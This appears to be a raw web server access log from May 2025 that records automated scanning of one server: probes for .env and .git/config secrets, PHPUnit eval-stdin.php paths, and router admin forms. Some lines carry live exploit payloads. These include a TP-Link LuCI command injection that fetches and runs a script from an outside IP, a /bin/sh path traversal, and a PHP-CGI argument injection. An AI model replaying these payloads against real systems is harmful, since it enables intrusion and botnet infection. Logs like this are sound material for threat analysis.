45.148.10.42 - - [04/May/2025:17:40:03 +0530] "GET /data/.git/config HTTP/1.1" 404 214 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:03 +0530] "GET /server/.git/config HTTP/1.1" 404 216 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:04 +0530] "GET /dev/.git/config HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:04 +0530] "GET /.env.config HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:04 +0530] "GET /prod/.env HTTP/1.1" 404 207 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:04 +0530] "GET /.env.uat HTTP/1.1" 404 206 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:05 +0530] "GET /backup/.git/config HTTP/1.1" 404 216 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:05 +0530] "GET /.env.template HTTP/1.1" 404 211 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:05 +0530] "GET /.env.testing HTTP/1.1" 404 210 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:05 +0530] "GET /.env.default HTTP/1.1" 404 210 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:06 +0530] "GET /.env.dev HTTP/1.1" 404 206 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:06 +0530] "GET /admin/.git/config HTTP/1.1" 404 215 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:06 +0530] "GET /.env.dist HTTP/1.1" 404 207 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:06 +0530] "GET /.env.staging.local HTTP/1.1" 404 216 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:07 +0530] "GET /api/.git/config HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:07 +0530] "GET /.env.backup HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:07 +0530] "GET /.env.production HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:08 +0530] "GET /.env.local HTTP/1.1" 404 208 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:08 +0530] "GET /.env.preprod HTTP/1.1" 404 210 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:08 +0530] "GET /build/.env HTTP/1.1" 404 208 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:08 +0530] "GET /project/.git/config HTTP/1.1" 404 217 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:09 +0530] "GET /config/.git/config HTTP/1.1" 404 216 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:09 +0530] "GET /.env.bak HTTP/1.1" 404 206 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:09 +0530] "GET /.env HTTP/1.1" 404 202 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:09 +0530] "GET /configuration/.env HTTP/1.1" 404 216 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:10 +0530] "GET /settings/.env HTTP/1.1" 404 211 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:10 +0530] "GET /core/.git/config HTTP/1.1" 404 214 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:10 +0530] "GET /public/.git/config HTTP/1.1" 404 216 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:10 +0530] "GET /static../.git/config HTTP/1.1" 404 218 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:11 +0530] "GET /api/.env HTTP/1.1" 404 206 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:11 +0530] "GET /cms/.git/config HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:11 +0530] "GET /app/.git/config HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:12 +0530] "GET /files/.git/config HTTP/1.1" 404 215 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:12 +0530] "GET /.env.ci HTTP/1.1" 404 205 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:12 +0530] "GET /.env.save HTTP/1.1" 404 207 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:12 +0530] "GET /.env.sandbox HTTP/1.1" 404 210 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:13 +0530] "GET /.env.development.local HTTP/1.1" 404 220 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:13 +0530] "GET /.env.prod HTTP/1.1" 404 207 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:13 +0530] "GET /.env.secret HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:13 +0530] "GET /assets../.git/config HTTP/1.1" 404 218 "-" "l9explore/1.2.2"
43.159.141.150 - - [04/May/2025:17:53:22 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.34 - - [04/May/2025:17:54:55 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:17:56:13 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
212.107.12.18 - - [04/May/2025:17:56:31 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.7 - - [04/May/2025:18:02:01 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:18:02:36 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
162.243.19.73 - - [04/May/2025:18:09:05 +0530] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
162.243.19.73 - - [04/May/2025:18:09:05 +0530] "GET /.git/config HTTP/1.1" 404 209 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
185.218.84.178 - - [04/May/2025:18:11:33 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.178 - - [04/May/2025:18:14:27 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.142.182 - - [04/May/2025:18:16:39 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
170.106.148.137 - - [04/May/2025:18:18:42 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.91.127.81 - - [04/May/2025:18:19:14 +0530] "CONNECT api.ip.pn:443 HTTP/1.1" 200 4270 "-" "Go-http-client/1.1"
185.91.127.81 - - [04/May/2025:18:19:14 +0530] "\x16\x03\x01" 400 226 "-" "-"
154.81.156.34 - - [04/May/2025:18:24:35 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:18:24:43 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
212.107.12.18 - - [04/May/2025:18:25:44 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.91.127.81 - - [04/May/2025:18:26:16 +0530] "CONNECT api.ip.pn:443 HTTP/1.1" 200 4270 "-" "Go-http-client/1.1"
185.91.127.81 - - [04/May/2025:18:26:17 +0530] "\x16\x03\x01" 400 226 "-" "-"
185.218.84.39 - - [04/May/2025:18:26:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0"
212.107.12.18 - - [04/May/2025:18:27:43 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.218.84.39 - - [04/May/2025:18:41:07 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0"
176.65.149.195 - - [04/May/2025:18:41:49 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [04/May/2025:18:44:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.242.226.12 - - [04/May/2025:18:47:18 +0530] "\x16\x03\x01" 400 226 "-" "-"
185.242.226.12 - - [04/May/2025:18:47:44 +0530] "\x16\x03\x01" 400 226 "-" "-"
154.81.156.34 - - [04/May/2025:18:52:38 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:18:53:51 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
185.218.84.39 - - [04/May/2025:18:59:04 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0"
117.34.73.69 - - [04/May/2025:18:59:31 +0530] "GET /phpmyadmin/index.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36"
117.34.73.69 - - [04/May/2025:18:59:31 +0530] "GET /pmd/index.php HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36"
117.34.73.69 - - [04/May/2025:18:59:32 +0530] "GET /phpmyadmin4.8.5/index.php HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36"
176.65.137.188 - - [04/May/2025:19:02:55 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:19:02:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:19:02:56 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.107.12.18 - - [04/May/2025:19:04:09 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:19:04:16 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:19:10:01 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:19:10:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:19:10:02 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
154.81.156.7 - - [04/May/2025:19:12:37 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
117.200.122.91 - - [04/May/2025:19:19:13 +0530] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 221 "-" "-"
154.81.156.35 - - [04/May/2025:19:19:17 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [04/May/2025:19:19:49 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:19:20:52 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
5.183.209.244 - - [04/May/2025:19:22:20 +0530] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 224 "-" "-"
154.81.156.35 - - [04/May/2025:19:23:29 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.95.147.209 - - [04/May/2025:19:31:29 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1" 404 224 "-" "Go-http-client/1.1"
212.107.12.18 - - [04/May/2025:19:33:13 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:19:33:36 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:19:35:05 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
103.203.56.2 - - [04/May/2025:19:35:07 +0530] "GET / HTTP/1.1" 200 4270 "-" "HTTP Banner Detection (https://security.ipip.net)"
204.76.203.35 - - [04/May/2025:19:38:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
176.65.142.182 - - [04/May/2025:19:38:05 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
204.76.203.35 - - [04/May/2025:19:39:40 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
176.65.137.188 - - [04/May/2025:19:42:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:19:42:02 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:19:42:02 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
185.218.84.39 - - [04/May/2025:19:45:57 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0"
45.95.147.209 - - [04/May/2025:19:46:27 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1" 404 224 "-" "Go-http-client/1.1"
154.81.156.34 - - [04/May/2025:19:47:30 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
185.218.84.39 - - [04/May/2025:19:48:48 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0"
154.81.156.34 - - [04/May/2025:19:49:49 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
185.91.127.81 - - [04/May/2025:19:52:03 +0530] "CONNECT api.ip.pn:443 HTTP/1.1" 200 4270 "-" "Go-http-client/1.1"
185.91.127.81 - - [04/May/2025:19:52:03 +0530] "\x16\x03\x01" 400 226 "-" "-"
15.235.224.227 - - [04/May/2025:19:52:06 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
212.107.12.18 - - [04/May/2025:19:57:42 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:19:58:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.7 - - [04/May/2025:20:01:47 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
162.142.125.208 - - [04/May/2025:20:06:38 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.208 - - [04/May/2025:20:06:39 +0530] "GET /./favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.208 - - [04/May/2025:20:06:40 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.208 - - [04/May/2025:20:06:41 +0530] "PRI * HTTP/2.0" 400 226 "-" "-"
162.142.125.208 - - [04/May/2025:20:06:45 +0530] "GET /./favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.208 - - [04/May/2025:20:06:46 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.208 - - [04/May/2025:20:06:46 +0530] "\x16\x03\x01" 400 226 "-" "-"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "\x16\x03\x01\x01\x05\x01" 400 226 "-" "-"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA572694) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1737.98 Mobile Safari/537.3"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /@vite/env HTTP/1.1" 404 207 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /actuator/env HTTP/1.1" 404 210 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /server HTTP/1.1" 404 204 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /.vscode/sftp.json HTTP/1.1" 404 215 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /about HTTP/1.1" 404 203 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /debug/default/view?panel=config HTTP/1.1" 404 216 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /v2/_catalog HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 273 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /server-status HTTP/1.1" 200 2563 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /login.action HTTP/1.1" 404 210 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /_all_dbs HTTP/1.1" 404 206 "-" "Mozilla/5.0 (l9scan/2.0.633323e21353e2534313e2330313; +https://leakix.net)"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /.DS_Store HTTP/1.1" 404 207 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /.env HTTP/1.1" 404 202 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /.git/config HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /s/633323e21353e2534313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /config.json HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /telescope/requests HTTP/1.1" 404 216 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /info.php HTTP/1.1" 404 206 "-" "Go-http-client/1.1"
157.245.105.107 - - [04/May/2025:20:11:33 +0530] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1620 "-" "Go-http-client/1.1"
::1 - - [04/May/2025:20:11:36 +0530] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
176.65.142.182 - - [04/May/2025:20:16:40 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.34 - - [04/May/2025:20:16:55 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:20:16:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
123.57.165.38 - - [04/May/2025:20:19:29 +0530] "GET /version HTTP/1.1" 404 205 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
45.79.172.21 - - [04/May/2025:20:22:43 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
91.196.152.4 - - [04/May/2025:20:23:39 +0530] "\x16\x03\x03\x01\xa7\x01" 400 226 "-" "-"
91.196.152.5 - - [04/May/2025:20:23:42 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
34.34.185.61 - - [04/May/2025:20:25:02 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:02 +0530] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:03 +0530] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 209 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:03 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 248 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:03 +0530] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 244 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:04 +0530] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 240 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:04 +0530] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 236 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:04 +0530] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 243 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:05 +0530] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 255 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:05 +0530] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 241 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:06 +0530] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 237 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:06 +0530] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 233 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:06 +0530] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 229 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:06 +0530] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 245 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:07 +0530] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 241 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:07 +0530] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 237 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:08 +0530] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 233 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:08 +0530] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:09 +0530] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 256 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:09 +0530] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:10 +0530] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 251 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:10 +0530] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:11 +0530] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 253 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:11 +0530] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 254 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:11 +0530] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 251 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:12 +0530] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 254 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:12 +0530] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 253 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:13 +0530] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 256 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:13 +0530] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:14 +0530] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 253 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:14 +0530] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:15 +0530] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:15 +0530] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 254 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:15 +0530] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 255 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:16 +0530] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 253 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:16 +0530] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 265 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:16 +0530] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 254 "-" "Custom-AsyncHttpClient"
